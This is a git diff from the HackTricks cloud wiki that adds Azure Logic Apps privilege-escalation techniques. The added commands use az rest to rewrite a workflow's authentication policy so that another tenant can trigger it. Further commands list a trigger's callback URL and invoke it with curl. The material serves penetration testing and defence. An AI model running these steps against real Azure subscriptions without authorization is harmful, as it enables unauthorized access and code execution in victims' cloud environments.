Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud

2026-01-10 20:23:28 -08:00 · 2025-02-22 17:12:56 +01:00
parent 77da1e58ca 516553f4bf
commit 2d32b37d9c
5 changed files with 219 additions and 27 deletions
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
@@ -35,6 +35,69 @@ az rest \
  --body '{}' \
  --headers "Content-Type=application/json"
 ```
+Addittionaly with just `Microsoft.Logic/workflows/write` you change the Authorization Policy, giving for example another tenant the capability to trigger the workflow:
+```bash
+az rest --method PUT \
+  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group-name>/providers/Microsoft.Logic/workflows/<workflow-name>?api-version=2016-10-01" \
+  --body '{
+    "location": "<region>",
+    "properties": {
+      "definition": {
+        "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
+        "contentVersion": "1.0.0.0",
+        "parameters": {
+          "$connections": {
+            "defaultValue": {},
+            "type": "Object"
+          }
+        },
+        "triggers": {
+          "<trigger-name>": {
+            "type": "Request",
+            "kind": "Http"
+          }
+        },
+        "actions": {},
+        "outputs": {}
+      },
+      "accessControl": {
+        "triggers": {
+          "openAuthenticationPolicies": {
+            "policies": {
+              "<policy-name>": {
+                "type": "AAD",
+                "claims": [
+                  {
+                    "name": "iss",
+                    "value": "<issuer-url>"
+                  }
+                ]
+              }
+            }
+          }
+        }
+      }
+    }
+  }'
+
+```
+
+### `Microsoft.Logic/workflows/triggers/listCallbackUrl/action`
+You can get the callback URL of the trigger and run it.
+
+```bash
+az rest --method POST \
+  --uri "https://management.azure.com/subscriptions/<subscription_id>/resourceGroups/<resource_group>/providers/Microsoft.Logic/workflows/<workflow_name>/triggers/<trigger_name>/listCallbackUrl?api-version=2019-05-01"
+```
+
+This will return a callback URL like `https://prod-28.centralus.logic.azure.com:443/workflows/....`. Now we can run it with:
+
+```bash
+curl --request POST \
+     --url "https://prod-28.centralus.logic.azure.com:443/workflows/<workflow_id>/triggers/<trigger_name>/paths/invoke?api-version=2019-05-01&sp=%2Ftriggers%2F<trigger_name>%2Frun&sv=1.0&sig=<signature>" \
+     --header 'Content-Type: application/json' \
+     --data '{"exampleKey": "exampleValue"}'
+```

 ### (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/basicPublishingCredentialsPolicies/read`, `Microsoft.Web/sites/write`, `Microsoft.Web/sites/config/list/action`) && (`Microsoft.Web/sites/start/action`)
 With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. Alongside the start permissions you can update and deploy a new Logic App with the content desired